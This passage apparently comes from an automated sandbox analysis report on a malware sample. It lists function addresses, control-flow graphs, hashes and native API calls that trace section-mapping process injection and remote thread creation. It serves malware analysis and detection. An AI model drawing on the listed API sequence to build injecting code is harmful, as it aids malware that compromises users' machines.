                                                                                • Snapshot File: hcaresult_0_2_272d000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction ID: a20c8e65846e0ef3b1e9c73ddafc0dd8e4aa508d2912543f465ff53c78b4009c
                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction Fuzzy Hash: 30113C79A00208EFDB01DF98C985E99BBF5EF08351F0580A4F948AB362D371EA50DF80
                                                                                Function 0040191E Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 407 40191e-40195e call 401196 Sleep call 40141a 416 401960-401968 call 401513 407->416 417 40196d-4019b8 call 401196 407->417 416->417
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401949
                                                                                  • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                                                                                  • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
                                                                                • Instruction ID: c6131c3a50a378ccb7249bf603a143f64ac18458d27712ce8a7102c0a8bf1339
                                                                                • Opcode Fuzzy Hash: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
                                                                                • Instruction Fuzzy Hash: 03011DB5208105E7EB006E95D861E7E33699B44315F308537BA53791F5C63D8A13E72F

                                                                                Non-executed Functions

                                                                                Function 026E092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1765840803.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_26e0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$GetProcAddress.$l
                                                                                • API String ID: 0-2784972518
                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                • Instruction ID: d33365e718eb4851909870bd2a4c1d45733d9aeded6a39d49589a835823d026a
                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                • Instruction Fuzzy Hash: FE3136B6901609DFDB10CF99C884AAEBBF9FF58324F14504AD842B7350D7B1EA45CBA4
                                                                                Function 00403303 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: s
                                                                                • API String ID: 0-453955339
                                                                                • Opcode ID: eedef14d38feace3816fe3cd4774d354149888b4caddecef66e7ad46f3b5c5c4
                                                                                • Instruction ID: df7459a9271a08be24ff0b8828e1d07c2a02c212f77545da3660dd99799ea33f
                                                                                • Opcode Fuzzy Hash: eedef14d38feace3816fe3cd4774d354149888b4caddecef66e7ad46f3b5c5c4
                                                                                • Instruction Fuzzy Hash: BD318D6151C6C19FD3124F254825A6A7F689603312B2900FFD842BB2E3D73D9B07939F
                                                                                Function 004020E7 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: j1
                                                                                • API String ID: 0-4002328062
                                                                                • Opcode ID: 4efd56776a1cf48e51d5b8b28f3c88fced1d5df91a33fef9abe88d0c8160b6dd
                                                                                • Instruction ID: 7ffeeb59c018ebe80191c9150d7c44a1840aee0603b3a4286ce7f0937f8dfb2f
                                                                                • Opcode Fuzzy Hash: 4efd56776a1cf48e51d5b8b28f3c88fced1d5df91a33fef9abe88d0c8160b6dd
                                                                                • Instruction Fuzzy Hash: 1EF0287808838899CB02AF36C755B99FF31BF87335F78469ED9962A392C6200649C760
                                                                                Function 004020B8 Relevance: .1, Instructions: 125COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1a27345af654d8e993b371437472085dc99020dacbb88babffce4e4e1de5afcb
                                                                                • Instruction ID: 0881589c7ff5ff5768f2d8d6c75c742b5463282b0ed343a47442533531e174b2
                                                                                • Opcode Fuzzy Hash: 1a27345af654d8e993b371437472085dc99020dacbb88babffce4e4e1de5afcb
                                                                                • Instruction Fuzzy Hash: 1D110A3A449345D9C60155278B4AB6BFB707A53730B308667D257267E18979028AE337
                                                                                Function 02733DBF Relevance: .1, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1766013823.000000000272D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0272D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_272d000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                • Instruction ID: 93afc675fdde9d1fc70e6f1983bce6a31a84b46aab086e6352fc4d6c9e90fbe6
                                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                • Instruction Fuzzy Hash: 7A118E72380104AFDB55DF55DC80EA6B3EAEB88220B1980A5ED04CB316E679EC41CBA0
                                                                                Function 004020B6 Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7679fe5b6e44f9d9bc89cc9259ef9fe0df295a63758788235af8aeaec9500c5a
                                                                                • Instruction ID: 5e4278b07ce3c8393ea1c67bbc9533801249a46e55f2d55876e4d3ceabbd52a2
                                                                                • Opcode Fuzzy Hash: 7679fe5b6e44f9d9bc89cc9259ef9fe0df295a63758788235af8aeaec9500c5a
                                                                                • Instruction Fuzzy Hash: 3F016174049348D9D7016A36DB4DBA7BB21BB43320F30826BD707352C2C9B4054BE367
                                                                                Function 004020C4 Relevance: .0, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 55f04470bba513d6a1ff85116eb4bd7e5a7bfe650738b85bdc777e345750bb4e
                                                                                • Instruction ID: 5e560d39f8138ce68ee94cfd6023eaf6832ac934b81d0532f16e67c5e36192ac
                                                                                • Opcode Fuzzy Hash: 55f04470bba513d6a1ff85116eb4bd7e5a7bfe650738b85bdc777e345750bb4e
                                                                                • Instruction Fuzzy Hash: 80018E340493848ECB029B35C71A7A9FF71BF93335F34819FC5571A6E2C6240209D751
                                                                                Function 026E0D90 Relevance: .0, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1765840803.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_26e0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                • Instruction ID: 8184fe419887a895b5f967bfc8e837201a15083de4d3b503441f0ebb32cc3d0a
                                                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                • Instruction Fuzzy Hash: C801A276A126048FDF21DF24C804BAE33E9EB86316F4544B5D90BE7385E7B4A9418F90
                                                                                Function 004020E3 Relevance: .0, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6f6600757ac2f7f113cd3111149c0096a045daac26c52c0a983afeb1d7d6023c
                                                                                • Instruction ID: fce5d5c764085920edf89c5c9efb60a7985776bdb309a80537f9fa9cbbd5f206
                                                                                • Opcode Fuzzy Hash: 6f6600757ac2f7f113cd3111149c0096a045daac26c52c0a983afeb1d7d6023c
                                                                                • Instruction Fuzzy Hash: 5DF04E7408834499DB416A36C7457A9FB21BF83320F34825FD547256D2CA74054AE711
                                                                                Function 004020FC Relevance: .0, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a78d0ae9cedb3364fca3541f3adf29928ee5114118790e41c8b89e96890051af
                                                                                • Instruction ID: 9ff9efdcd1480cc8040ea01fdd64be9b4a39a154ba86f8cede482a75e84e4065
                                                                                • Opcode Fuzzy Hash: a78d0ae9cedb3364fca3541f3adf29928ee5114118790e41c8b89e96890051af
                                                                                • Instruction Fuzzy Hash: 36F02B7804574859CB02AF37C7416D9FF31BE83235F74464ED4561A392C720060DC760
                                                                                Function 004025DD Relevance: .0, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb15b2d9d84d8bcf95237442851c33c9a576287e722d5cdf4983b928f5d9cc64
                                                                                • Instruction ID: f390e3d0f4c9bd654050140e8d70974a6db2ab88ea7c37a64fdc5b7086b4af87
                                                                                • Opcode Fuzzy Hash: fb15b2d9d84d8bcf95237442851c33c9a576287e722d5cdf4983b928f5d9cc64
                                                                                • Instruction Fuzzy Hash: 24E07227DC33200F87700ECDB0D60086F97B6B03233B60FAACA80333588B328C010288
                                                                                Function 00402285 Relevance: .0, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0f115ba61ab4e6362ff08d3704e71e4c4144fd1ee34f6209e35425aa647f651c
                                                                                • Instruction ID: de7e959eacdc078ffa18660aebfbf422b397b465e6f902e3b5059cef9d8e7c6e
                                                                                • Opcode Fuzzy Hash: 0f115ba61ab4e6362ff08d3704e71e4c4144fd1ee34f6209e35425aa647f651c
                                                                                • Instruction Fuzzy Hash: 6EF0273944D2488EDB15DF35D2D16BEFF71BE5321076A145CC5C70B102EA200248CBA0
                                                                                Function 0040267C Relevance: .0, Instructions: 5COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f051c0fcd709177014542cd0273e44ec655c7c60457a6c32fe43c7d43ebeaafc
                                                                                • Instruction ID: c4400a266d698cb3cd2bf7b5ca235fa4f1f280859f6ddc9359233ff16ff34d52
                                                                                • Opcode Fuzzy Hash: f051c0fcd709177014542cd0273e44ec655c7c60457a6c32fe43c7d43ebeaafc
                                                                                • Instruction Fuzzy Hash: B6A00249D125A384C524C50436C041C1A81305ED107689F05D180D9405F348C4C61043
                                                                                Function 004026DC Relevance: .0, Instructions: 2COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1764769641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4dc631e3e5db65b995aa59b44de7f2b4dcbe59aa107c656cad5b6ec07d9cd269
                                                                                • Instruction ID: 99d9351f112c3ed816393754bebdd5c910e51bb06e2b48d37259af443894e6f8
                                                                                • Opcode Fuzzy Hash: 4dc631e3e5db65b995aa59b44de7f2b4dcbe59aa107c656cad5b6ec07d9cd269
                                                                                • Instruction Fuzzy Hash:

                                                                                Execution Graph

                                                                                Execution Coverage:5.8%
                                                                                Dynamic/Decrypted Code Coverage:39.3%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:84
                                                                                Total number of Limit Nodes:3
                                                                                execution_graph 3981 401906 3982 40191c 3981->3982 3983 401941 Sleep 3982->3983 3984 40195c 3983->3984 3985 401513 7 API calls 3984->3985 3986 40196d 3984->3986 3985->3986 3919 403149 3920 403150 3919->3920 3921 4030fe RtlCreateUserThread NtTerminateProcess 3920->3921 3923 403157 3920->3923 3922 40312a 3921->3922 3928 250003c 3929 2500049 3928->3929 3941 2500e0f SetErrorMode SetErrorMode 3929->3941 3934 2500265 3935 25002ce VirtualProtect 3934->3935 3937 250030b 3935->3937 3936 2500439 VirtualFree 3940 25004be LoadLibraryA 3936->3940 3937->3936 3939 25008c7 3940->3939 3942 2500223 3941->3942 3943 2500d90 3942->3943 3944 2500dad 3943->3944 3945 2500dbb GetPEB 3944->3945 3946 2500238 VirtualAlloc 3944->3946 3945->3946 3946->3934 3947 402e8e 3949 402e86 3947->3949 3950 402f1f 3949->3950 3951 4018fa 3949->3951 3952 40190a 3951->3952 3953 401941 Sleep 3952->3953 3954 40195c 3953->3954 3956 40196d 3954->3956 3957 401513 3954->3957 3956->3950 3958 401522 3957->3958 3959 4015c1 NtDuplicateObject 3958->3959 3965 4016dd 3958->3965 3960 4015de NtCreateSection 3959->3960 3959->3965 3961 401604 NtMapViewOfSection 3960->3961 3962 40165e NtCreateSection 3960->3962 3961->3962 3963 401627 NtMapViewOfSection 3961->3963 3964 40168a 3962->3964 3962->3965 3963->3962 3966 401645 3963->3966 3964->3965 3967 401694 NtMapViewOfSection 3964->3967 3965->3956 3966->3962 3967->3965 3968 4016bb NtMapViewOfSection 3967->3968 3968->3965 3901 26f4afc 3904 26f4b02 3901->3904 3905 26f4b11 3904->3905 3908 26f52a2 3905->3908 3910 26f52bd 3908->3910 3909 26f52c6 CreateToolhelp32Snapshot 3909->3910 3911 26f52e2 Module32First 3909->3911 3910->3909 3910->3911 3912 26f52f1 3911->3912 3914 26f4b01 3911->3914 3915 26f4f61 3912->3915 3916 26f4f8c 3915->3916 3917 26f4f9d VirtualAlloc 3916->3917 3918 26f4fd5 3916->3918 3917->3918 3918->3918 4037 402fd3 4038 40312a 4037->4038 4039 402ffd 4037->4039 4039->4038 4040 4030fe RtlCreateUserThread NtTerminateProcess 4039->4040 4040->4038 4031 402e35 4033 402e6f 4031->4033 4032 402f1f 4033->4032 4034 4018fa 8 API calls 4033->4034 4034->4032 4035 250092b GetPEB 4036 2500972 4035->4036 3924 26f4af3 3925 26f4b15 3924->3925 3926 26f52a2 3 API calls 3925->3926 3927 26f4b1a 3926->3927 3993 40151e 3994 40154c 3993->3994 3995 4015c1 NtDuplicateObject 3994->3995 4004 4016dd 3994->4004 3996 4015de NtCreateSection 3995->3996 3995->4004 3997 401604 NtMapViewOfSection 3996->3997 3998 40165e NtCreateSection 3996->3998 3997->3998 3999 401627 NtMapViewOfSection 3997->3999 4000 40168a 3998->4000 3998->4004 3999->3998 4001 401645 3999->4001 4002 401694 NtMapViewOfSection 4000->4002 4000->4004 4001->3998 4003 4016bb NtMapViewOfSection 4002->4003 4002->4004 4003->4004

                                                                                Executed Functions

                                                                                Function 00401513 Relevance: 10.7, APIs: 7, Instructions: 207nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 85 401513-401546 92 401555 85->92 93 40154c-40156b call 401196 85->93 92->93 97 401570-401575 93->97 98 40156d 93->98 100 40157b-40158c 97->100 101 40189d-4018a5 97->101 98->97 104 401592-4015bb 100->104 105 40189b-4018bf 100->105 101->97 104->105 115 4015c1-4015d8 NtDuplicateObject 104->115 109 4018b0-4018bb 105->109 110 4018c2-4018d4 105->110 109->110 113 4018d7 110->113 114 4018ca-4018d0 110->114 116 4018eb 113->116 117 4018df-4018f7 call 401196 113->117 114->113 115->105 118 4015de-401602 NtCreateSection 115->118 116->117 120 401604-401625 NtMapViewOfSection 118->120 121 40165e-401684 NtCreateSection 118->121 120->121 122 401627-401643 NtMapViewOfSection 120->122 121->105 123 40168a-40168e 121->123 122->121 126 401645-40165b 122->126 123->105 127 401694-4016b5 NtMapViewOfSection 123->127 126->121 127->105 128 4016bb-4016d7 NtMapViewOfSection 127->128 128->105 130 4016dd call 4016e2 128->130
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2007689092.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sbttifb.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
                                                                                • Instruction ID: ebc0160933c68a8b7ae7f1ca7eda0dd03739b2ad6b995580a9f4ea7b057fd4c7
                                                                                • Opcode Fuzzy Hash: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
                                                                                • Instruction Fuzzy Hash: AB616171600204FBEB209F95DC49FAF7BB8EF85B00F14412AFA12BA1E4D7759A01DB25
                                                                                Function 0040151E Relevance: 10.7, APIs: 7, Instructions: 178nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 132 40151e-40156b call 401196 137 401570-401575 132->137 138 40156d 132->138 140 40157b-40158c 137->140 141 40189d-4018a5 137->141 138->137 144 401592-4015bb 140->144 145 40189b-4018bf 140->145 141->137 144->145 155 4015c1-4015d8 NtDuplicateObject 144->155 149 4018b0-4018bb 145->149 150 4018c2-4018d4 145->150 149->150 153 4018d7 150->153 154 4018ca-4018d0 150->154 156 4018eb 153->156 157 4018df-4018f7 call 401196 153->157 154->153 155->145 158 4015de-401602 NtCreateSection 155->158 156->157 160 401604-401625 NtMapViewOfSection 158->160 161 40165e-401684 NtCreateSection 158->161 160->161 162 401627-401643 NtMapViewOfSection 160->162 161->145 163 40168a-40168e 161->163 162->161 166 401645-40165b 162->166 163->145 167 401694-4016b5 NtMapViewOfSection 163->167 166->161 167->145 168 4016bb-4016d7 NtMapViewOfSection 167->168 168->145 170 4016dd call 4016e2 168->170
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2007689092.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sbttifb.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
                                                                                • Instruction ID: 81614cc47252d4ee750cd10e5f363bec598540b14c8849c2392ba6a7819565d6
                                                                                • Opcode Fuzzy Hash: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
                                                                                • Instruction Fuzzy Hash: 8B5137B1900248BFEF209F91CC49FEFBBB8EF85B00F144159FA11BA2A5D6759905CB24
                                                                                Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 172 401553-40156b call 401196 178 401570-401575 172->178 179 40156d 172->179 181 40157b-40158c 178->181 182 40189d-4018a5 178->182 179->178 185 401592-4015bb 181->185 186 40189b-4018bf 181->186 182->178 185->186 196 4015c1-4015d8 NtDuplicateObject 185->196 190 4018b0-4018bb 186->190 191 4018c2-4018d4 186->191 190->191 194 4018d7 191->194 195 4018ca-4018d0 191->195 197 4018eb 194->197 198 4018df-4018f7 call 401196 194->198 195->194 196->186 199 4015de-401602 NtCreateSection 196->199 197->198 201 401604-401625 NtMapViewOfSection 199->201 202 40165e-401684 NtCreateSection 199->202 201->202 203 401627-401643 NtMapViewOfSection 201->203 202->186 204 40168a-40168e 202->204 203->202 207 401645-40165b 203->207 204->186 208 401694-4016b5 NtMapViewOfSection 204->208 207->202 208->186 209 4016bb-4016d7 NtMapViewOfSection 208->209 209->186 211 4016dd call 4016e2 209->211
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2007689092.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sbttifb.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
                                                                                • Instruction ID: d0bd6428bf20664bceabbb55207a57fb76a02318494b8c1f9a1cb2173d989cf6
                                                                                • Opcode Fuzzy Hash: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
                                                                                • Instruction Fuzzy Hash: 565128B1900249BBEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D7719941CB24
                                                                                Function 00402FD3 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 213 402fd3-402ff7 214 40312a-40312f 213->214 215 402ffd-403015 213->215 215->214 216 40301b-40302c 215->216 217 40302e-403037 216->217 218 40303c-40304a 217->218 218->218 219 40304c-403053 218->219 220 403075-40307c 219->220 221 403055-403074 219->221 222 40309e-4030a1 220->222 223 40307e-40309d 220->223 221->220 224 4030a3-4030a6 222->224 225 4030aa 222->225 223->222 224->225 227 4030a8 224->227 225->217 226 4030ac-4030b1 225->226 226->214 228 4030b3-4030b6 226->228 227->226 228->214 229 4030b8-403127 RtlCreateUserThread NtTerminateProcess 228->229 229->214
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2007689092.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sbttifb.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcessTerminateThreadUser
                                                                                • String ID:
                                                                                • API String ID: 1921587553-0
                                                                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                • Instruction ID: c5f1771b03d6f6f48bc893f8c69e4bd59083146a95f7f1e574921d9c63f51eee
                                                                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                • Instruction Fuzzy Hash: 9A412631218E088FD768EE6CA84576277D5FB98311F6643AAE809D3389FE34DC1183C9
                                                                                Function 00403149 Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
